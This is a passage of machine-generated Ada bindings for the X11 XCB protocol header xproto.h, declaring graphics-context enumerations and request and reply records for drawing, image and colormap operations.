XCB_GX_OR, XCB_GX_NOR, XCB_GX_EQUIV, XCB_GX_INVERT, XCB_GX_OR_REVERSE, XCB_GX_COPY_INVERTED, XCB_GX_OR_INVERTED, XCB_GX_NAND, XCB_GX_SET) with Convention => C; -- /usr/include/xcb/xproto.h:3171 type xcb_line_style_t is (XCB_LINE_STYLE_SOLID, XCB_LINE_STYLE_ON_OFF_DASH, XCB_LINE_STYLE_DOUBLE_DASH) with Convention => C; -- /usr/include/xcb/xproto.h:3190 type xcb_cap_style_t is (XCB_CAP_STYLE_NOT_LAST, XCB_CAP_STYLE_BUTT, XCB_CAP_STYLE_ROUND, XCB_CAP_STYLE_PROJECTING) with Convention => C; -- /usr/include/xcb/xproto.h:3196 type xcb_join_style_t is (XCB_JOIN_STYLE_MITER, XCB_JOIN_STYLE_ROUND, XCB_JOIN_STYLE_BEVEL) with Convention => C; -- /usr/include/xcb/xproto.h:3203 type xcb_fill_style_t is (XCB_FILL_STYLE_SOLID, XCB_FILL_STYLE_TILED, XCB_FILL_STYLE_STIPPLED, XCB_FILL_STYLE_OPAQUE_STIPPLED) with Convention => C; -- /usr/include/xcb/xproto.h:3209 type xcb_fill_rule_t is (XCB_FILL_RULE_EVEN_ODD, XCB_FILL_RULE_WINDING) with Convention => C; -- /usr/include/xcb/xproto.h:3216 type xcb_subwindow_mode_t is (XCB_SUBWINDOW_MODE_CLIP_BY_CHILDREN, XCB_SUBWINDOW_MODE_INCLUDE_INFERIORS) with Convention => C; -- /usr/include/xcb/xproto.h:3221 type xcb_arc_mode_t is (XCB_ARC_MODE_CHORD, XCB_ARC_MODE_PIE_SLICE) with Convention => C; -- /usr/include/xcb/xproto.h:3226 --* -- * @brief xcb_create_gc_value_list_t -- * type xcb_create_gc_value_list_t is record c_function : aliased bits_stdint_uintn_h.uint32_t; -- /usr/include/xcb/xproto.h:3235 plane_mask : aliased bits_stdint_uintn_h.uint32_t; -- /usr/include/xcb/xproto.h:3236 foreground : aliased bits_stdint_uintn_h.uint32_t; -- /usr/include/xcb/xproto.h:3237 background : aliased bits_stdint_uintn_h.uint32_t; -- /usr/include/xcb/xproto.h:3238 line_width : aliased bits_stdint_uintn_h.uint32_t; -- /usr/include/xcb/xproto.h:3239 line_style : aliased bits_stdint_uintn_h.uint32_t; -- /usr/include/xcb/xproto.h:3240 cap_style : aliased bits_stdint_uintn_h.uint32_t; -- /usr/include/xcb/xproto.h:3241 join_style : aliased bits_stdint_uintn_h.uint32_t; -- /usr/include/xcb/xproto.h:3242 fill_style : aliased bits_stdint_uintn_h.uint32_t; -- /usr/include/xcb/xproto.h:3243 fill_rule : aliased bits_stdint_uintn_h.uint32_t; -- /usr/include/xcb/xproto.h:3244 tile : aliased xcb_pixmap_t; -- /usr/include/xcb/xproto.h:3245 stipple : aliased xcb_pixmap_t; -- /usr/include/xcb/xproto.h:3246 tile_stipple_x_origin : aliased bits_stdint_intn_h.int32_t; -- /usr/include/xcb/xproto.h:3247 tile_stipple_y_origin : aliased bits_stdint_intn_h.int32_t; -- /usr/include/xcb/xproto.h:3248 font : aliased xcb_font_t; -- /usr/include/xcb/xproto.h:3249 subwindow_mode : aliased bits_stdint_uintn_h.uint32_t; -- /usr/include/xcb/xproto.h:3250 graphics_exposures : aliased xcb_bool32_t; -- /usr/include/xcb/xproto.h:3251 clip_x_origin : aliased bits_stdint_intn_h.int32_t; -- /usr/include/xcb/xproto.h:3252 clip_y_origin : aliased bits_stdint_intn_h.int32_t; -- /usr/include/xcb/xproto.h:3253 clip_mask : aliased xcb_pixmap_t; -- /usr/include/xcb/xproto.h:3254 dash_offset : aliased bits_stdint_uintn_h.uint32_t; -- /usr/include/xcb/xproto.h:3255 dashes : aliased bits_stdint_uintn_h.uint32_t; -- /usr/include/xcb/xproto.h:3256 arc_mode : aliased bits_stdint_uintn_h.uint32_t; -- /usr/include/xcb/xproto.h:3257 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:3234 --* Opcode for xcb_create_gc. --* -- * @brief xcb_create_gc_request_t -- * type xcb_create_gc_request_t is record major_opcode : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:3267 pad0 : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:3268 length : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:3269 cid : aliased xcb_gcontext_t; -- /usr/include/xcb/xproto.h:3270 drawable : aliased xcb_drawable_t; -- /usr/include/xcb/xproto.h:3271 value_mask : aliased bits_stdint_uintn_h.uint32_t; -- /usr/include/xcb/xproto.h:3272 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:3266 --* -- * @brief xcb_change_gc_value_list_t -- * type xcb_change_gc_value_list_t is record c_function : aliased bits_stdint_uintn_h.uint32_t; -- /usr/include/xcb/xproto.h:3279 plane_mask : aliased bits_stdint_uintn_h.uint32_t; -- /usr/include/xcb/xproto.h:3280 foreground : aliased bits_stdint_uintn_h.uint32_t; -- /usr/include/xcb/xproto.h:3281 background : aliased bits_stdint_uintn_h.uint32_t; -- /usr/include/xcb/xproto.h:3282 line_width : aliased bits_stdint_uintn_h.uint32_t; -- /usr/include/xcb/xproto.h:3283 line_style : aliased bits_stdint_uintn_h.uint32_t; -- /usr/include/xcb/xproto.h:3284 cap_style : aliased bits_stdint_uintn_h.uint32_t; -- /usr/include/xcb/xproto.h:3285 join_style : aliased bits_stdint_uintn_h.uint32_t; -- /usr/include/xcb/xproto.h:3286 fill_style : aliased bits_stdint_uintn_h.uint32_t; -- /usr/include/xcb/xproto.h:3287 fill_rule : aliased bits_stdint_uintn_h.uint32_t; -- /usr/include/xcb/xproto.h:3288 tile : aliased xcb_pixmap_t; -- /usr/include/xcb/xproto.h:3289 stipple : aliased xcb_pixmap_t; -- /usr/include/xcb/xproto.h:3290 tile_stipple_x_origin : aliased bits_stdint_intn_h.int32_t; -- /usr/include/xcb/xproto.h:3291 tile_stipple_y_origin : aliased bits_stdint_intn_h.int32_t; -- /usr/include/xcb/xproto.h:3292 font : aliased xcb_font_t; -- /usr/include/xcb/xproto.h:3293 subwindow_mode : aliased bits_stdint_uintn_h.uint32_t; -- /usr/include/xcb/xproto.h:3294 graphics_exposures : aliased xcb_bool32_t; -- /usr/include/xcb/xproto.h:3295 clip_x_origin : aliased bits_stdint_intn_h.int32_t; -- /usr/include/xcb/xproto.h:3296 clip_y_origin : aliased bits_stdint_intn_h.int32_t; -- /usr/include/xcb/xproto.h:3297 clip_mask : aliased xcb_pixmap_t; -- /usr/include/xcb/xproto.h:3298 dash_offset : aliased bits_stdint_uintn_h.uint32_t; -- /usr/include/xcb/xproto.h:3299 dashes : aliased bits_stdint_uintn_h.uint32_t; -- /usr/include/xcb/xproto.h:3300 arc_mode : aliased bits_stdint_uintn_h.uint32_t; -- /usr/include/xcb/xproto.h:3301 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:3278 --* Opcode for xcb_change_gc. --* -- * @brief xcb_change_gc_request_t -- * type xcb_change_gc_request_t is record major_opcode : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:3311 pad0 : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:3312 length : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:3313 gc : aliased xcb_gcontext_t; -- /usr/include/xcb/xproto.h:3314 value_mask : aliased bits_stdint_uintn_h.uint32_t; -- /usr/include/xcb/xproto.h:3315 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:3310 --* Opcode for xcb_copy_gc. --* -- * @brief xcb_copy_gc_request_t -- * type xcb_copy_gc_request_t is record major_opcode : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:3325 pad0 : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:3326 length : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:3327 src_gc : aliased xcb_gcontext_t; -- /usr/include/xcb/xproto.h:3328 dst_gc : aliased xcb_gcontext_t; -- /usr/include/xcb/xproto.h:3329 value_mask : aliased bits_stdint_uintn_h.uint32_t; -- /usr/include/xcb/xproto.h:3330 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:3324 --* Opcode for xcb_set_dashes. --* -- * @brief xcb_set_dashes_request_t -- * type xcb_set_dashes_request_t is record major_opcode : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:3340 pad0 : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:3341 length : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:3342 gc : aliased xcb_gcontext_t; -- /usr/include/xcb/xproto.h:3343 dash_offset : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:3344 dashes_len : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:3345 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:3339 type xcb_clip_ordering_t is (XCB_CLIP_ORDERING_UNSORTED, XCB_CLIP_ORDERING_Y_SORTED, XCB_CLIP_ORDERING_YX_SORTED, XCB_CLIP_ORDERING_YX_BANDED) with Convention => C; -- /usr/include/xcb/xproto.h:3348 --* Opcode for xcb_set_clip_rectangles. --* -- * @brief xcb_set_clip_rectangles_request_t -- * type xcb_set_clip_rectangles_request_t is record major_opcode : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:3362 ordering : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:3363 length : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:3364 gc : aliased xcb_gcontext_t; -- /usr/include/xcb/xproto.h:3365 clip_x_origin : aliased bits_stdint_intn_h.int16_t; -- /usr/include/xcb/xproto.h:3366 clip_y_origin : aliased bits_stdint_intn_h.int16_t; -- /usr/include/xcb/xproto.h:3367 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:3361 --* Opcode for xcb_free_gc. --* -- * @brief xcb_free_gc_request_t -- * type xcb_free_gc_request_t is record major_opcode : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:3377 pad0 : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:3378 length : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:3379 gc : aliased xcb_gcontext_t; -- /usr/include/xcb/xproto.h:3380 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:3376 --* Opcode for xcb_clear_area. --* -- * @brief xcb_clear_area_request_t -- * type xcb_clear_area_request_t is record major_opcode : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:3390 exposures : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:3391 length : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:3392 window : aliased xcb_window_t; -- /usr/include/xcb/xproto.h:3393 x : aliased bits_stdint_intn_h.int16_t; -- /usr/include/xcb/xproto.h:3394 y : aliased bits_stdint_intn_h.int16_t; -- /usr/include/xcb/xproto.h:3395 width : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:3396 height : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:3397 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:3389 --* Opcode for xcb_copy_area. --* -- * @brief xcb_copy_area_request_t -- * type xcb_copy_area_request_t is record major_opcode : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:3407 pad0 : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:3408 length : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:3409 src_drawable : aliased xcb_drawable_t; -- /usr/include/xcb/xproto.h:3410 dst_drawable : aliased xcb_drawable_t; -- /usr/include/xcb/xproto.h:3411 gc : aliased xcb_gcontext_t; -- /usr/include/xcb/xproto.h:3412 src_x : aliased bits_stdint_intn_h.int16_t; -- /usr/include/xcb/xproto.h:3413 src_y : aliased bits_stdint_intn_h.int16_t; -- /usr/include/xcb/xproto.h:3414 dst_x : aliased bits_stdint_intn_h.int16_t; -- /usr/include/xcb/xproto.h:3415 dst_y : aliased bits_stdint_intn_h.int16_t; -- /usr/include/xcb/xproto.h:3416 width : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:3417 height : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:3418 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:3406 --* Opcode for xcb_copy_plane. --* -- * @brief xcb_copy_plane_request_t -- * type xcb_copy_plane_request_t is record major_opcode : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:3428 pad0 : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:3429 length : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:3430 src_drawable : aliased xcb_drawable_t; -- /usr/include/xcb/xproto.h:3431 dst_drawable : aliased xcb_drawable_t; -- /usr/include/xcb/xproto.h:3432 gc : aliased xcb_gcontext_t; -- /usr/include/xcb/xproto.h:3433 src_x : aliased bits_stdint_intn_h.int16_t; -- /usr/include/xcb/xproto.h:3434 src_y : aliased bits_stdint_intn_h.int16_t; -- /usr/include/xcb/xproto.h:3435 dst_x : aliased bits_stdint_intn_h.int16_t; -- /usr/include/xcb/xproto.h:3436 dst_y : aliased bits_stdint_intn_h.int16_t; -- /usr/include/xcb/xproto.h:3437 width : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:3438 height : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:3439 bit_plane : aliased bits_stdint_uintn_h.uint32_t; -- /usr/include/xcb/xproto.h:3440 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:3427 type xcb_coord_mode_t is (XCB_COORD_MODE_ORIGIN, XCB_COORD_MODE_PREVIOUS) with Convention => C; -- /usr/include/xcb/xproto.h:3443 --*< Treats all coordinates as relative to the origin. --*< Treats all coordinates after the first as relative to the previous coordinate. --* Opcode for xcb_poly_point. --* -- * @brief xcb_poly_point_request_t -- * type xcb_poly_point_request_t is record major_opcode : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:3459 coordinate_mode : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:3460 length : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:3461 drawable : aliased xcb_drawable_t; -- /usr/include/xcb/xproto.h:3462 gc : aliased xcb_gcontext_t; -- /usr/include/xcb/xproto.h:3463 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:3458 --* Opcode for xcb_poly_line. --* -- * @brief xcb_poly_line_request_t -- * type xcb_poly_line_request_t is record major_opcode : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:3473 coordinate_mode : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:3474 length : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:3475 drawable : aliased xcb_drawable_t; -- /usr/include/xcb/xproto.h:3476 gc : aliased xcb_gcontext_t; -- /usr/include/xcb/xproto.h:3477 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:3472 --* -- * @brief xcb_segment_t -- * type xcb_segment_t is record x1 : aliased bits_stdint_intn_h.int16_t; -- /usr/include/xcb/xproto.h:3484 y1 : aliased bits_stdint_intn_h.int16_t; -- /usr/include/xcb/xproto.h:3485 x2 : aliased bits_stdint_intn_h.int16_t; -- /usr/include/xcb/xproto.h:3486 y2 : aliased bits_stdint_intn_h.int16_t; -- /usr/include/xcb/xproto.h:3487 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:3483 --* -- * @brief xcb_segment_iterator_t -- * type xcb_segment_iterator_t is record data : access xcb_segment_t; -- /usr/include/xcb/xproto.h:3494 c_rem : aliased int; -- /usr/include/xcb/xproto.h:3495 index : aliased int; -- /usr/include/xcb/xproto.h:3496 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:3493 --* Opcode for xcb_poly_segment. --* -- * @brief xcb_poly_segment_request_t -- * type xcb_poly_segment_request_t is record major_opcode : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:3506 pad0 : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:3507 length : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:3508 drawable : aliased xcb_drawable_t; -- /usr/include/xcb/xproto.h:3509 gc : aliased xcb_gcontext_t; -- /usr/include/xcb/xproto.h:3510 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:3505 --* Opcode for xcb_poly_rectangle. --* -- * @brief xcb_poly_rectangle_request_t -- * type xcb_poly_rectangle_request_t is record major_opcode : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:3520 pad0 : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:3521 length : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:3522 drawable : aliased xcb_drawable_t; -- /usr/include/xcb/xproto.h:3523 gc : aliased xcb_gcontext_t; -- /usr/include/xcb/xproto.h:3524 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:3519 --* Opcode for xcb_poly_arc. --* -- * @brief xcb_poly_arc_request_t -- * type xcb_poly_arc_request_t is record major_opcode : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:3534 pad0 : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:3535 length : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:3536 drawable : aliased xcb_drawable_t; -- /usr/include/xcb/xproto.h:3537 gc : aliased xcb_gcontext_t; -- /usr/include/xcb/xproto.h:3538 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:3533 type xcb_poly_shape_t is (XCB_POLY_SHAPE_COMPLEX, XCB_POLY_SHAPE_NONCONVEX, XCB_POLY_SHAPE_CONVEX) with Convention => C; -- /usr/include/xcb/xproto.h:3541 --* Opcode for xcb_fill_poly. --* -- * @brief xcb_fill_poly_request_t -- * type xcb_fill_poly_request_t_array1823 is array (0 .. 1) of aliased bits_stdint_uintn_h.uint8_t; type xcb_fill_poly_request_t is record major_opcode : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:3554 pad0 : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:3555 length : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:3556 drawable : aliased xcb_drawable_t; -- /usr/include/xcb/xproto.h:3557 gc : aliased xcb_gcontext_t; -- /usr/include/xcb/xproto.h:3558 shape : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:3559 coordinate_mode : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:3560 pad1 : aliased xcb_fill_poly_request_t_array1823; -- /usr/include/xcb/xproto.h:3561 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:3553 --* Opcode for xcb_poly_fill_rectangle. --* -- * @brief xcb_poly_fill_rectangle_request_t -- * type xcb_poly_fill_rectangle_request_t is record major_opcode : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:3571 pad0 : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:3572 length : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:3573 drawable : aliased xcb_drawable_t; -- /usr/include/xcb/xproto.h:3574 gc : aliased xcb_gcontext_t; -- /usr/include/xcb/xproto.h:3575 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:3570 --* Opcode for xcb_poly_fill_arc. --* -- * @brief xcb_poly_fill_arc_request_t -- * type xcb_poly_fill_arc_request_t is record major_opcode : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:3585 pad0 : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:3586 length : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:3587 drawable : aliased xcb_drawable_t; -- /usr/include/xcb/xproto.h:3588 gc : aliased xcb_gcontext_t; -- /usr/include/xcb/xproto.h:3589 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:3584 type xcb_image_format_t is (XCB_IMAGE_FORMAT_XY_BITMAP, XCB_IMAGE_FORMAT_XY_PIXMAP, XCB_IMAGE_FORMAT_Z_PIXMAP) with Convention => C; -- /usr/include/xcb/xproto.h:3592 --* Opcode for xcb_put_image. --* -- * @brief xcb_put_image_request_t -- * type xcb_put_image_request_t_array1823 is array (0 .. 1) of aliased bits_stdint_uintn_h.uint8_t; type xcb_put_image_request_t is record major_opcode : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:3605 format : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:3606 length : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:3607 drawable : aliased xcb_drawable_t; -- /usr/include/xcb/xproto.h:3608 gc : aliased xcb_gcontext_t; -- /usr/include/xcb/xproto.h:3609 width : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:3610 height : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:3611 dst_x : aliased bits_stdint_intn_h.int16_t; -- /usr/include/xcb/xproto.h:3612 dst_y : aliased bits_stdint_intn_h.int16_t; -- /usr/include/xcb/xproto.h:3613 left_pad : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:3614 depth : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:3615 pad0 : aliased xcb_put_image_request_t_array1823; -- /usr/include/xcb/xproto.h:3616 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:3604 --* -- * @brief xcb_get_image_cookie_t -- * type xcb_get_image_cookie_t is record sequence : aliased unsigned; -- /usr/include/xcb/xproto.h:3623 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:3622 --* Opcode for xcb_get_image. --* -- * @brief xcb_get_image_request_t -- * type xcb_get_image_request_t is record major_opcode : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:3633 format : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:3634 length : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:3635 drawable : aliased xcb_drawable_t; -- /usr/include/xcb/xproto.h:3636 x : aliased bits_stdint_intn_h.int16_t; -- /usr/include/xcb/xproto.h:3637 y : aliased bits_stdint_intn_h.int16_t; -- /usr/include/xcb/xproto.h:3638 width : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:3639 height : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:3640 plane_mask : aliased bits_stdint_uintn_h.uint32_t; -- /usr/include/xcb/xproto.h:3641 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:3632 --* -- * @brief xcb_get_image_reply_t -- * type xcb_get_image_reply_t_array1992 is array (0 .. 19) of aliased bits_stdint_uintn_h.uint8_t; type xcb_get_image_reply_t is record response_type : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:3648 depth : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:3649 sequence : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:3650 length : aliased bits_stdint_uintn_h.uint32_t; -- /usr/include/xcb/xproto.h:3651 visual : aliased xcb_visualid_t; -- /usr/include/xcb/xproto.h:3652 pad0 : aliased xcb_get_image_reply_t_array1992; -- /usr/include/xcb/xproto.h:3653 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:3647 --* Opcode for xcb_poly_text_8. --* -- * @brief xcb_poly_text_8_request_t -- * type xcb_poly_text_8_request_t is record major_opcode : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:3663 pad0 : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:3664 length : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:3665 drawable : aliased xcb_drawable_t; -- /usr/include/xcb/xproto.h:3666 gc : aliased xcb_gcontext_t; -- /usr/include/xcb/xproto.h:3667 x : aliased bits_stdint_intn_h.int16_t; -- /usr/include/xcb/xproto.h:3668 y : aliased bits_stdint_intn_h.int16_t; -- /usr/include/xcb/xproto.h:3669 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:3662 --* Opcode for xcb_poly_text_16. --* -- * @brief xcb_poly_text_16_request_t -- * type xcb_poly_text_16_request_t is record major_opcode : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:3679 pad0 : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:3680 length : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:3681 drawable : aliased xcb_drawable_t; -- /usr/include/xcb/xproto.h:3682 gc : aliased xcb_gcontext_t; -- /usr/include/xcb/xproto.h:3683 x : aliased bits_stdint_intn_h.int16_t; -- /usr/include/xcb/xproto.h:3684 y : aliased bits_stdint_intn_h.int16_t; -- /usr/include/xcb/xproto.h:3685 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:3678 --* Opcode for xcb_image_text_8. --* -- * @brief xcb_image_text_8_request_t -- * type xcb_image_text_8_request_t is record major_opcode : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:3695 string_len : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:3696 length : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:3697 drawable : aliased xcb_drawable_t; -- /usr/include/xcb/xproto.h:3698 gc : aliased xcb_gcontext_t; -- /usr/include/xcb/xproto.h:3699 x : aliased bits_stdint_intn_h.int16_t; -- /usr/include/xcb/xproto.h:3700 y : aliased bits_stdint_intn_h.int16_t; -- /usr/include/xcb/xproto.h:3701 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:3694 --* Opcode for xcb_image_text_16. --* -- * @brief xcb_image_text_16_request_t -- * type xcb_image_text_16_request_t is record major_opcode : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:3711 string_len : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:3712 length : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:3713 drawable : aliased xcb_drawable_t; -- /usr/include/xcb/xproto.h:3714 gc : aliased xcb_gcontext_t; -- /usr/include/xcb/xproto.h:3715 x : aliased bits_stdint_intn_h.int16_t; -- /usr/include/xcb/xproto.h:3716 y : aliased bits_stdint_intn_h.int16_t; -- /usr/include/xcb/xproto.h:3717 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:3710 type xcb_colormap_alloc_t is (XCB_COLORMAP_ALLOC_NONE, XCB_COLORMAP_ALLOC_ALL) with Convention => C; -- /usr/include/xcb/xproto.h:3720 --* Opcode for xcb_create_colormap. --* -- * @brief xcb_create_colormap_request_t -- * type xcb_create_colormap_request_t is record major_opcode : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:3732 alloc : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:3733 length : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:3734 mid : aliased xcb_colormap_t; -- /usr/include/xcb/xproto.h:3735 window : aliased xcb_window_t; -- /usr/include/xcb/xproto.h:3736 visual : aliased xcb_visualid_t; -- /usr/include/xcb/xproto.h:3737 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:3731 --* Opcode for xcb_free_colormap. --* -- * @brief xcb_free_colormap_request_t -- * type xcb_free_colormap_request_t is record major_opcode : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:3747 pad0 : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:3748 length : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:3749 cmap : aliased xcb_colormap_t; -- /usr/include/xcb/xproto.h:3750 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:3746 --* Opcode for xcb_copy_colormap_and_free. --* -- * @brief xcb_copy_colormap_and_free_request_t -- * type xcb_copy_colormap_and_free_request_t is record major_opcode : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:3760 pad0 : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:3761 length : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:3762 mid : aliased xcb_colormap_t; -- /usr/include/xcb/xproto.h:3763 src_cmap : aliased xcb_colormap_t; -- /usr/include/xcb/xproto.h:3764 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:3759 --* Opcode for xcb_install_colormap. --* -- * @brief 